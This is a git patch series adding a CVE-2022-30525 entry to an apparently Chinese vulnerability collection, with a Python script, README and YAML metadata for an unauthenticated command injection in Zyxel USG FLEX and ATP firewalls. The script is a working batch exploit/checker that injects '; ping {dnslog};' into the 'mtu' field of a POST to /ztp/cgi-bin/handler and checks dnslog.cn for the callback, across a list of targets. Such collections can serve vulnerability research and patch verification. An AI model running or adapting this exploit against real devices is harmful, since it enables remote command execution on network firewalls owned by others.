From d165efb9a1d3909efe94ae407581db4f505a14d9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?= Date: Thu, 23 Mar 2023 15:13:06 +0800 Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-30525?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .DS_Store | Bin 0 -> 8196 bytes cve/.DS_Store | Bin 0 -> 6148 bytes cve/Zyxel/.DS_Store | Bin 0 -> 6148 bytes cve/Zyxel/2022/.DS_Store | Bin 0 -> 6148 bytes .../2022/CVE-2022-30535/CVE-2022-30525.py | 119 ++++++++++++++++++ cve/Zyxel/2022/CVE-2022-30535/README.md | 30 +++++ cve/Zyxel/2022/yaml/CVE-2022-30525.yaml | 19 +++ openkylin_list.yaml | 2 + 8 files changed, 170 insertions(+) create mode 100644 .DS_Store create mode 100644 cve/.DS_Store create mode 100644 cve/Zyxel/.DS_Store create mode 100644 cve/Zyxel/2022/.DS_Store create mode 100644 cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py create mode 100644 cve/Zyxel/2022/CVE-2022-30535/README.md create mode 100644 cve/Zyxel/2022/yaml/CVE-2022-30525.yaml diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..d7aa354b0703b6d995a4434011fde166e69e8909 GIT binary patch literal 8196 zcmeHMTWl0n7(U;$&>1?=0a{tG1Dh^Hz!pktZMh}en{qF*E!~#Ovb!_Vf!Ud|GrKL8 zn#RNz5RFe7Z;>Z&kp~qezWAUh`lx7vF~(pt>We1$qVnKBb7m=RA-))+I47C&pZ|8w z{Qvp>nLV?NF?1BPb&N$AVmT^8qjz^CpaYyHE>s=+!etQ1KgeD(ZDVq&HI#A>$Pn&QyQl;dkuXgrBrv?mYX&#J?}dhnocJB`wdI8M>_0+r8&NDf-6Kxlu}A$ zY^=Gdu|B%4sd>CUI=0>$x3t_lJ}!whv9%lbq>h?7%Rb2iK=2S?bEgG#YBCzrDR%O& z5oL+YFpuWTQZ&+>N_no@pBxz6C#RGJMY`>tVb`!NXRn@jh^CY(hr-*MwXNNG-P8AH zZL^TGoRl&@n>MorGwtf_rkOAv(n(h3Wb?LZ?zSDnn`R*C>Z7iwo1sb$I(FXe^e0Oi zG(Wde3XZ-X-bGV8)zdSKz@;i>{(^;ajXX$sv|Qss zL(dPSovdzYhIP1a#L(QK{-WU+8B_1I(m7q4k9z4+Rb=s!J8M;y8%#QsOp}F-ajamt z$Ca2U`fEhhI(ffF_q5a2yj3(&IY;x*>MPVbb)To{%AeP%kNo06jOb=u?&YJZXEUsASn;byr;O=j&}jzV-KE^Aji)q~!$ zJJOEZGpt+QEnVcg`$#wF45jmW&jRAGxVEpPZ0xF2)d6q1c1`nR zSQ1%Wr6$xqQTbF%DT-kg4FWxFE62VVi|4-acPAEK&37qQ+AKfOv3MirC3>l;tci88 z9qbUxvoUs>JtA^V(t&33=5qXKhKiE1pta@3;*t!Tq~bf5>ju?Gq4 z#}Eu0frC*T#~4oFQJlmnoW|pL3eV#OyofV+6>s28oWt9A4;S$xS7A&fspD1QP^;u$=P z=LqR9;bpvn*YG;w{2iRfyLcZT-~v7h5dRh7{U=ZU5Ty^8sF;K=bg2qbRDA0Yo6T%r@jky qQ$7R`fBg?b8b`_0^N9y^f>V-E`^P^7{Php*@ckdY|9x!U&fTBX5oNOg literal 0 HcmV?d00001 diff --git a/cve/.DS_Store b/cve/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..a6355d098d01e0a31d7ee873c2d21b2a8f6ad048 GIT binary patch literal 6148 zcmeHK+e*Vg5Z$${O({Yi6#5wOwO}t)5MM&9KVU?`3pF7@gE3p0)F`EpXZ<0+#P4xt zcLOa3A4Tj8?4H@V>}C#RFN`tn%!58-CS%NihR9K=5Hwf1wsbHemvh8^o=*K(_!ZOq zO%r~5gI%##_QFE8`u!jNG>+1&*ZbsKwR&T_X*7+taqB*a+|9gfo;u#_8b{|s#D1xJ z{zVk#6La@OB$*c_;Y=n(K?or?mr)Xk+!6C6NM)|897fA%P0Y?>F&y-|R(~*DcCEz` z>Z8%&a@jKW_79HFCXew`BHk2{92l3fqp^f{P*y5>c4tW}l6$b08D%6PF+dCu1H`~) zGN8``qrI8sQ`N)(G4KNexIb9X5N(ZxLb-K7hu3HH*AY=b$F~HcrP0<{CbTlFH`x* zUr(VCF+dFbGX{8l?2a8MN}sLY%EPnPf_4WD1>*`-KtNx+1i%3Ik&bjKzlA!)*%}Ll UI1AckIv`yHBq7uh1HZt)7oGV^;s5{u literal 0 HcmV?d00001 diff --git a/cve/Zyxel/.DS_Store b/cve/Zyxel/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..586237459d3d61e9d30161b2348bb984b7258f0e GIT binary patch literal 6148 zcmeHK%}T>S5Z<-XrW7Fug&r5Y7EG!Y#7l_v1&ruHr6#0kFlI}W+CwSitS{t~_&m<+ zZp31}ir5*L{bqJ%cC#O3e;8vtm?j=$4r9y)MdWC#5bRzV+Azt89LI=f#W>Dn4E~#m z{dK@^w^)z4puMl(ACI%NC|&oRZ#1mUt)|_y+xBhvAZKA2mD3`KCfDd)NSVd89mSXF zXf||qPGw$3X+D~$f;1UH%FR`pCvq0ZX`U3SHq-&TWw(Y-XFm5154yth+(lQ+k9%%c z^!rDPMa$mZ+dnxUK4wq3e9?q*;9JSI!5Ut{_*~C(ILR}a-$P%WU*{1L1H=F^Kn$!e z1LjPy+v`gKt(+Jj27X`w_Xh!r=o_pws;vVWygp;xLPP-@-x7$zpl`6!2oVsjO96E$ zH%|<%%b{PGJl|lYQI|8WW`=Rh%=P1itJ$GnsC34CjnonY#K1BG4edI3{-41wv+|L@ zTtXf(Kn(md2Dmi{2LUX~oUPxMhi9z-y#qzTyb28vu$L|Y;NU*eQ9&ISXhWWFu+oU5 TV81E{q>F$egc@St7Z~^es>w)y literal 0 HcmV?d00001 diff --git a/cve/Zyxel/2022/.DS_Store b/cve/Zyxel/2022/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..df4051b002d19d2094d950b9dcd090d3307a19ea GIT binary patch literal 6148 zcmeHK%}N6?5T3NvZYfF+3OxqAR@}B$5HCxAUci-lP^r7L=;C%$`r{&{uxEWCpTy^J zCP|C6{@g^`%rg0s$xN2{vLrhI!0MB38K3|F7Aj#Xhs_s4^Q0@1(v}P&lWSDKh6+B1 zP+jphhX2R_?cFXkpbahDwU7H}Lk)Ma=EtLf9||A+Uj0EBjK;S8#!~6b)^^s)T6ycn zy%(`N_QsP@-5Xxf=t79lpZ7h#9rWT(VXq;gu@^+Wp$rJRJ#@Lg45F@x>tYghM>5t` z6IRa3bqdAlw0vAG@p9RomH70uVwZTWb~2mgto?(dv-8eF*pI}sB9`GdC}l_E9A2>V zV~&sRFbYLbeG&Y&bfx3J0c( z52oMDbcMp?+i`s^-GMm@O=}o13@kH{R>K0_|E=%q|K%VvG7K07)`|g^X}ZlirljxI ymE`EI<*2u)B;=PUT!dgpUd8B3S8)+l3feh!5FL$)LbRZm9|1{&X$%8@%D_9sg@z9R literal 0 HcmV?d00001 diff --git a/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py new file mode 100644 index 00000000..a2b09db6 --- /dev/null +++ b/cve/Zyxel/2022/CVE-2022-30535/CVE-2022-30525.py @@ -0,0 +1,119 @@ +#!/usr/bin/env python +# -*- conding:utf-8 -*- +import requests +import argparse +import sys +import urllib3 +import json +import time +import random +import signal + +dnslog_res = requests.session() +urllib3.disable_warnings() + +__desc__ = 'CVE-2022-30525利用dnslog批量验证' +__author__ = 'savior' +__date__ = '2022/05/14' +__version__ = 'v0.1' +__link__ = 'https://github.com/savior-only/CVE-2022-30525' + + +def banner(): + print(""" + ██████ ██ ██ ████████ ████ ████ ████ ████ ████ ████ ██████ ████ ██████ + ██░░░░██░██ ░██░██░░░░░ █░░░ █ █░░░██ █░░░ █ █░░░ █ █░░░ █ █░░░██░█░░░░ █░░░ █░█░░░░ + ██ ░░ ░██ ░██░██ ░ ░█░█ █░█░ ░█░ ░█ ░ ░█░█ █░█░█████ ░ ░█░█████ +░██ ░░██ ██ ░███████ █████ ███ ░█ █ ░█ ███ ███ █████ ███ ░█ █ ░█░░░░░ █ ███ ░░░░░ █ +░██ ░░██ ██ ░██░░░░ ░░░░░ █░░ ░██ ░█ █░░ █░░ ░░░░░ ░░░ █░██ ░█ ░█ █░░ ░█ +░░██ ██ ░░████ ░██ █ ░█ ░█ █ █ █ ░█░█ ░█ █ ░█ █ █ ░█ + ░░██████ ░░██ ░████████ ░██████░ ████ ░██████░██████ ░ ████ ░ ████ ░ ████ ░██████░ ████ + ░░░░░░ ░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░░ ░░░░░░ ░░░░ ░░░░ ░░░░ ░░░░░░ ░░░░ + + + by {} {} + {} + """.format(__author__, __version__, __link__)) + + +class Dnslog: + + def get_dnslog(): + t = random.random() + url = f"http://www.dnslog.cn/getdomain.php?t={t}" + res1 = dnslog_res.get(url=url, proxies=proxies) + if res1.status_code == 200 and "dnslog" in res1.text: + dnslog = res1.text + return dnslog + else: + print("获取dnslog失败") + + + def get_data(): + t = random.random() + url = f"http://www.dnslog.cn/getrecords.php?t={t}" + res2 = dnslog_res.get(url=url, proxies=proxies) + return res2.text + +class information(object): + + def __init__(self,args): + self.args = args + self.url = args.url + self.file = args.file + + def target_url(self): + target_url = self.url + "/ztp/cgi-bin/handler" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0", + "Content-Type": "application/json" + } + dnslog = Dnslog.get_dnslog() + data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"} + try: + res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5) + except Exception as e: + pass + + time.sleep(5) + data = Dnslog.get_data() + if dnslog in data: + print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m") + print("[" + "-"*100 + "]") + else: + print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入!") + print("[" + "-"*100 + "]") + + def file_url(self): + with open(self.file, "r") as urls: + for url in urls: + url = url.strip() + if url[:4] != "http": + url = "http://" + url + self.url = url.strip() + information.target_url(self) + + +if __name__ == "__main__": + try: + banner() + parser = argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入', add_help=False) + parser.add_argument("-h", "--help", action="help", help="Show this help message and exit") + parser.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"") + parser.add_argument("-f", "--file", dest="file", help="Targets in file eg:\"url.txt\"") + parser.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)") + args = parser.parse_args() + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy)) + if args.url: + information(args).target_url() + elif args.file: + information(args).file_url() + #检测ctrl+c + except KeyboardInterrupt: + print("\n\033[31mYou choose to stop me.\033[0m") + + + + diff --git a/cve/Zyxel/2022/CVE-2022-30535/README.md b/cve/Zyxel/2022/CVE-2022-30535/README.md new file mode 100644 index 00000000..1a19e2e4 --- /dev/null +++ b/cve/Zyxel/2022/CVE-2022-30535/README.md @@ -0,0 +1,30 @@ +# CVE-2022-30525 +Zyxel 防火墙未经身份验证的远程命令注入 + +## 影响版本 + +### 影响组件 + +USG FLEX 100, 100W, 200, 500, 700 +USG20-VPN, USG20W-VPN +ATP 100, 200, 500, 700, 800 + +### 固件版本 + +ZLD5.00 thru ZLD5.21 Patch 1 +ZLD5.10 thru ZLD5.21 Patch 1 +ZLD5.10 thru ZLD5.21 Patch 1 + +## update + +-proxy + + + +## From +https://github.com/Henry4E36/CVE-2022-30525 + + +# ⚠️ 免责声明 + +此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用! 如果使用者使用该工具出现非法攻击等违法行为,与本作者无关! diff --git a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml new file mode 100644 index 00000000..6fb3992d --- /dev/null +++ b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-30525 +source: https://github.com/savior-only/CVE-2022-30525 +info: + name: Zyxel 防火墙未经身份验证的远程命令注入。 + severity: critical + description: + A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + scope-of-influence: + firmware versions 5.00 ~ 5.21 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-30525 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-30525 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-30525 + cnvd-id: None + kve-id: None + tags: cve2022, Vendor Advisory, VDB Entry, firmware diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 525f67ac..d0af7b2e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -131,6 +131,8 @@ cve: - CVE-2022-31692 Zimbra: - CVE-2022-27925 + Zyxel: + - CVE-2022-30525 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee From 70f877e3095b3d3fc82ce13478106e94cd3d2655 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?= Date: Thu, 23 Mar 2023 16:01:14 +0800 Subject: [PATCH 2/2] add cwe-id --- cve/.DS_Store | Bin 6148 -> 0 bytes cve/Zyxel/2022/yaml/CVE-2022-30525.yaml | 1 + 2 files changed, 1 insertion(+) delete mode 100644 cve/.DS_Store diff --git a/cve/.DS_Store b/cve/.DS_Store deleted file mode 100644 index a6355d098d01e0a31d7ee873c2d21b2a8f6ad048..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK+e*Vg5Z$${O({Yi6#5wOwO}t)5MM&9KVU?`3pF7@gE3p0)F`EpXZ<0+#P4xt zcLOa3A4Tj8?4H@V>}C#RFN`tn%!58-CS%NihR9K=5Hwf1wsbHemvh8^o=*K(_!ZOq zO%r~5gI%##_QFE8`u!jNG>+1&*ZbsKwR&T_X*7+taqB*a+|9gfo;u#_8b{|s#D1xJ z{zVk#6La@OB$*c_;Y=n(K?or?mr)Xk+!6C6NM)|897fA%P0Y?>F&y-|R(~*DcCEz` z>Z8%&a@jKW_79HFCXew`BHk2{92l3fqp^f{P*y5>c4tW}l6$b08D%6PF+dCu1H`~) zGN8``qrI8sQ`N)(G4KNexIb9X5N(ZxLb-K7hu3HH*AY=b$F~HcrP0<{CbTlFH`x* zUr(VCF+dFbGX{8l?2a8MN}sLY%EPnPf_4WD1>*`-KtNx+1i%3Ik&bjKzlA!)*%}Ll UI1AckIv`yHBq7uh1HZt)7oGV^;s5{u diff --git a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml index 6fb3992d..401981c4 100644 --- a/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml +++ b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml @@ -14,6 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-30525 + cwe-id: CWE-78 cnvd-id: None kve-id: None tags: cve2022, Vendor Advisory, VDB Entry, firmware -- Gitee